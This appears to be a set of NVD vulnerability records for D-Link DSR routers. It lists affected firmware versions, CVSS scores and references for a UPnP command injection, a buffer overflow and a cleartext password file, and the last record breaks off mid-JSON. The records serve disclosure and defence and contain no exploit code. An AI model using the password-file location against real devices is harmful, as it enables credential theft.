dlink dsr-250_firmware 3.14
dlink dsr-250 -
dlink dsr-1000n_firmware 2.11b201
dlink dsr-1000n -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:3.14:*:*:*:*:*:*:*",
              "matchCriteriaId": "45DCFBB4-008A-4D44-B566-CEC4F0EDF56A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:2.11b201:*:*:*:*:*:*:*",
              "matchCriteriaId": "BE93CCFE-AF5E-4FF9-B68C-2B364E93B9CA",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "The D-Link DSR-250 (3.14) and DSR-1000N (2.11B201) UPnP service contains a command injection vulnerability, which can cause remote command execution."
    },
    {
      "lang": "es",
      "value": "El servicio UPnP de D-Link DSR-250 (3.14) y DSR-1000N (2.11B201) contiene una vulnerabilidad de inyecci\u00f3n de comandos, que puede causar una ejecuci\u00f3n de comandos remota."
    }
  ],
  "id": "CVE-2020-18568",
  "lastModified": "2024-11-21T05:08:39.290",
  "metrics": {
    "cvssMetricV2": [
      {
        "acInsufInfo": false,
        "baseSeverity": "HIGH",
        "cvssData": {
          "accessComplexity": "LOW",
          "accessVector": "NETWORK",
          "authentication": "NONE",
          "availabilityImpact": "PARTIAL",
          "baseScore": 7.5,
          "confidentialityImpact": "PARTIAL",
          "integrityImpact": "PARTIAL",
          "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
          "version": "2.0"
        },
        "exploitabilityScore": 10.0,
        "impactScore": 6.4,
        "obtainAllPrivilege": false,
        "obtainOtherPrivilege": false,
        "obtainUserPrivilege": false,
        "source": "nvd@nist.gov",
        "type": "Primary",
        "userInteractionRequired": false
      }
    ],
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.8,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.9,
        "impactScore": 5.9,
        "source": "nvd@nist.gov",
        "type": "Primary"
      }
    ]
  },
  "published": "2021-02-02T14:15:11.327",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
    },
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin/"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Exploit",
        "Third Party Advisory"
      ],
      "url": "https://gist.github.com/WinMin/5b2bc43b517503472bb28a298981ed5a"
    },
    {
      "source": "af854a3a-2127-422b-91ae-364da2661108",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Modified",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-78"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2025-01-28 22:15
Modified
2025-07-01 15:15
Summary
A buffer overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, and DSR-1000N, from 3.13 to 3.17B901C, allows unauthenticated users to achieve remote code execution.
References



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B310A40-D26D-4C06-B3FF-15AB47406909",
              "versionEndIncluding": "3.17B901C",
              "versionStartIncluding": "3.13",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "94821C08-DF39-4150-B3EB-CF6B74A5E971",
              "versionEndIncluding": "3.17B901C",
              "versionStartIncluding": "3.13",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "4FE39937-BD26-4543-B716-F33BE64E86B0",
              "versionEndIncluding": "3.17B901C",
              "versionStartIncluding": "3.13",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "D489612E-5E25-4CE0-8CA4-00AA2DC8C9F2",
              "versionEndIncluding": "3.17B901C",
              "versionStartIncluding": "3.13",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "FBD12433-5C6B-4F30-BD62-6CDDEDE5F191",
              "versionEndIncluding": "3.17B901C",
              "versionStartIncluding": "3.13",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "BA55E761-BAAC-45E1-82B9-CE2046CC5DAB",
              "versionEndIncluding": "3.17b901c",
              "versionStartIncluding": "3.13",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "A buffer overflow vulnerability in D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, and DSR-1000N, from 3.13 to 3.17B901C, allows unauthenticated users to achieve remote code execution."
    },
    {
      "lang": "es",
      "value": "La vulnerabilidad de desbordamiento de b\u00fafer en D-Link DSR-150, DSR-150N, DSR-250, DSR-250N, DSR-500N, DSR-1000N de 3.13 a 3.17B901C permite a usuarios no autenticados ejecutar c\u00f3digo remoto."
    }
  ],
  "id": "CVE-2024-57376",
  "lastModified": "2025-07-01T15:15:40.243",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "ADJACENT_NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 8.8,
          "baseSeverity": "HIGH",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "NONE",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 2.8,
        "impactScore": 5.9,
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-01-28T22:15:15.990",
  "references": [
    {
      "source": "cve@mitre.org",
      "tags": [
        "Vendor Advisory"
      ],
      "url": "https://www.dlink.com/en/security-bulletin/"
    }
  ],
  "sourceIdentifier": "cve@mitre.org",
  "vulnStatus": "Analyzed",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-120"
        }
      ],
      "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
      "type": "Secondary"
    }
  ]
}

Vulnerability from fkie_nvd
Published
2013-12-19 04:24
Modified
2025-04-11 00:51
Summary
D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.05B64; DSR-250 and DSR-250N with firmware before 1.08B44; and DSR-500, DSR-500N, DSR-1000, and DSR-1000N with firmware before 1.08B77 stores account passwords in cleartext, which allows local users to obtain sensitive information by reading the Users[#]["Password"] fields in /tmp/teamf1.cfg.ascii.
Impacted products
Vendor Product Version
dlink dsr-150_firmware *
dlink dsr-150_firmware 1.05b29
dlink dsr-150_firmware 1.05b35
dlink dsr-150_firmware 1.05b46
dlink dsr-150_firmware 1.05b50
dlink dsr-150 -
dlink dsr-250_firmware *
dlink dsr-250_firmware 1.01b46
dlink dsr-250_firmware 1.01b56
dlink dsr-250_firmware 1.05b20
dlink dsr-250_firmware 1.05b53
dlink dsr-250_firmware 1.08b31
dlink dsr-250 -
dlink dsr-1000n_firmware *
dlink dsr-1000n_firmware 1.01b50
dlink dsr-1000n_firmware 1.02b11
dlink dsr-1000n_firmware 1.02b25
dlink dsr-1000n_firmware 1.03b12
dlink dsr-1000n_firmware 1.03b23
dlink dsr-1000n_firmware 1.03b27
dlink dsr-1000n_firmware 1.03b36
dlink dsr-1000n_firmware 1.03b43
dlink dsr-1000n_firmware 1.04b58
dlink dsr-1000n_firmware 1.06b43
dlink dsr-1000n_firmware 1.06b53
dlink dsr-1000n -
dlink dsr-150n_firmware *
dlink dsr-150n -
dlink dsr-500_firmware *
dlink dsr-500_firmware 1.02b11
dlink dsr-500_firmware 1.02b25
dlink dsr-500_firmware 1.03b12
dlink dsr-500_firmware 1.03b23
dlink dsr-500_firmware 1.03b27
dlink dsr-500_firmware 1.03b36
dlink dsr-500_firmware 1.03b43
dlink dsr-500_firmware 1.04b58
dlink dsr-500_firmware 1.06b43
dlink dsr-500_firmware 1.06b53
dlink dsr-500 -
dlink dsr-1000_firmware *
dlink dsr-1000_firmware 1.01b50
dlink dsr-1000_firmware 1.02b11
dlink dsr-1000_firmware 1.02b25
dlink dsr-1000_firmware 1.03b12
dlink dsr-1000_firmware 1.03b23
dlink dsr-1000_firmware 1.03b27
dlink dsr-1000_firmware 1.03b36
dlink dsr-1000_firmware 1.03b43
dlink dsr-1000_firmware 1.04b58
dlink dsr-1000_firmware 1.06b43
dlink dsr-1000_firmware 1.06b53
dlink dsr-1000 -
dlink dsr-250n_firmware *
dlink dsr-250n_firmware 1.01b46
dlink dsr-250n_firmware 1.01b56
dlink dsr-250n_firmware 1.05b20
dlink dsr-250n_firmware 1.05b53
dlink dsr-250n_firmware 1.08b31
dlink dsr-250n -
dlink dsr-500n_firmware *
dlink dsr-500n_firmware 1.02b11
dlink dsr-500n_firmware 1.02b25
dlink dsr-500n_firmware 1.03b12
dlink dsr-500n_firmware 1.03b23
dlink dsr-500n_firmware 1.03b27
dlink dsr-500n_firmware 1.03b36
dlink dsr-500n_firmware 1.03b43
dlink dsr-500n_firmware 1.04b58
dlink dsr-500n_firmware 1.06b43
dlink dsr-500n_firmware 1.06b53
dlink dsr-500n -



{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "83CA3AD5-8BB3-4C52-B1D4-57F24C7E3ECE",
              "versionEndIncluding": "1.08b29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b29:*:*:*:*:*:*:*",
              "matchCriteriaId": "EDDC40C8-1BB2-4151-BAA4-E28C5AC94654",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b35:*:*:*:*:*:*:*",
              "matchCriteriaId": "ADB61873-D7C7-400D-AAA3-5F65F459B573",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "2AD638F5-3A13-45D2-A343-1733611C5173",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150_firmware:1.05b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "9A27097B-44CF-47FB-90D1-0D244209E9DC",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2F9246BA-7F85-4564-B1B5-03BBBF9E2F35",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "1F360917-0D86-4B7C-8699-EAE3A5155DAD",
              "versionEndIncluding": "1.08b39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "91015BD6-F1EF-4E77-991E-5A895DF204FB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.01b56:*:*:*:*:*:*:*",
              "matchCriteriaId": "36443128-6668-4FB6-9B96-1C695EB5B0BD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b20:*:*:*:*:*:*:*",
              "matchCriteriaId": "11E46972-D923-4AB7-BC2E-49D9DBC65202",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.05b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "71900351-AF65-4AFB-A77E-361075583F43",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250_firmware:1.08b31:*:*:*:*:*:*:*",
              "matchCriteriaId": "0540F822-7F53-4282-A480-6E4A15994AF8",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "702F0FE2-5E5A-4E2B-8B7A-A0C84FF74F4E",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "289208CD-49AB-48A8-AD2E-BF4AFA479990",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.01b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "0FA9027F-9EBE-45FB-8128-E1E27F1B12EF",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "90E36C7E-02A1-4389-A706-B73D6C236E50",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "D5146B3C-CC4C-49C4-9B8B-BF9FC3E45293",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "79117184-9444-443B-9CF8-F4D2E19413A3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "AD92EB60-B33E-4653-BE5B-449DC18E073F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "DAE86995-60E0-4F50-A008-EBB227CC4207",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B6BA51E-FCC6-4BCC-A4FF-AF49602C6D5C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "484A7789-9A84-4E01-B7C8-97FC769D21AA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "592C6173-8084-4857-AD6A-DDF9F66CE881",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "A8025D5C-331B-4A62-9A0D-29EA63E7AB30",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000n_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "2987ACFB-FE89-4901-8A64-B5B61F4D4EE1",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "3CE07EC6-89F9-4E76-A5CE-B8EA28727F9A",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-150n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F2655D2C-0A71-4F14-8CB6-9A8E5B0BA2D2",
              "versionEndIncluding": "1.05b48",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-150n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "729C8468-E3D3-4089-B095-A41C719E9F8C",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "2616EA9D-842A-4C08-BEC0-DD0DE15627C4",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "86F457CD-2B3A-4571-941B-CEEAD52635C3",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "7D5FB42D-B664-4CD1-A9BE-BEEB3D2455F6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "0836B735-04EB-46DA-A5FD-918CF254DC6D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "C40D5762-D950-4C59-8E60-AD63A5C4F43E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "CD052065-A62C-4E77-AF30-A7BFE87BEF0D",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "84589477-A03F-4350-8F48-AA65A3E2F8EB",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "73B9957F-92B8-471A-90C1-541857228220",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "BB19EF7D-8CDD-4640-B272-2B31C6C8DC40",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "D3DE0EAD-26FE-4A08-8B3F-94B7B46B3EE2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "3EEC400B-B9A7-4672-98BB-57EE722FDDBB",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-500:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "ABF00635-340E-4116-8B4A-46138C13C9C3",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "8A6B7598-20C1-4F1A-BFA8-16C66D210216",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.01b50:*:*:*:*:*:*:*",
              "matchCriteriaId": "6F9A4E2D-8F74-4CD3-85F0-5DA4749B0F9F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DA26493-2F60-41C1-9563-75FAA116DBA2",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D5BA908-B289-4917-8AE3-E57DACB93501",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "9B94BCF9-13FC-4930-92A4-6AF97699672B",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "F1AED08D-47B4-4A13-8291-2E49AEB1B69F",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "2904D8F1-633D-4DF8-9808-2961998CE510",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b36:*:*:*:*:*:*:*",
              "matchCriteriaId": "FE195794-EDE9-477A-9934-8CE2ED1B19E7",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.03b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "BC8C2F15-6867-4647-9D2F-8F3D9F3054DD",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.04b58:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF08CD6-A360-4291-8159-DB2A07B8F2A6",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b43:*:*:*:*:*:*:*",
              "matchCriteriaId": "DDDBCCF6-71B8-45A8-86C4-97B622793179",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-1000_firmware:1.06b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "FF0BFC1A-B6DF-4D2E-9DD9-566E20CAD172",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-1000:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "AFF423A8-2E0B-4618-B384-5C97B4315B88",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "F8875595-6A45-41F4-BD4F-88E4B01987FB",
              "versionEndIncluding": "1.08b39",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b46:*:*:*:*:*:*:*",
              "matchCriteriaId": "4D87E55E-8FB9-46DD-B7E3-0FF5844AACCE",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.01b56:*:*:*:*:*:*:*",
              "matchCriteriaId": "7054BD9D-2CBD-4EB2-A52C-6EAD0DF16CEA",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b20:*:*:*:*:*:*:*",
              "matchCriteriaId": "7C7D6C20-02AB-45C2-8DF6-7406EF4B9E09",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.05b53:*:*:*:*:*:*:*",
              "matchCriteriaId": "20584156-C553-4AEA-A19C-A4BB67B5390A",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-250n_firmware:1.08b31:*:*:*:*:*:*:*",
              "matchCriteriaId": "1CB44CCA-AC5E-4169-A4DA-8873C1435C04",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:dlink:dsr-250n:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "E8754060-E58E-4A9A-AB59-0279E8BC793A",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "CA8E760B-FBD1-4949-9E7C-35E216094B58",
              "versionEndIncluding": "1.08b51",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b11:*:*:*:*:*:*:*",
              "matchCriteriaId": "F0478AA5-8740-4458-855A-11804597FA6C",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.02b25:*:*:*:*:*:*:*",
              "matchCriteriaId": "A6009D02-5CE9-4D08-8C6A-005F66ED8A29",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b12:*:*:*:*:*:*:*",
              "matchCriteriaId": "2DBC6011-8C8A-4EAA-8B6B-933C128E7A97",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b23:*:*:*:*:*:*:*",
              "matchCriteriaId": "540C7261-9352-4CF1-BCF8-13615EFB7C4E",
              "vulnerable": true
            },
            {
              "criteria": "cpe:2.3:o:dlink:dsr-500n_firmware:1.03b27:*:*:*:*:*:*:*",
              "matchCriteriaId": "31C51D13-005D-4CB0-AB05-D38CC4E5096B",
              "vulnerable": true
            },
            {
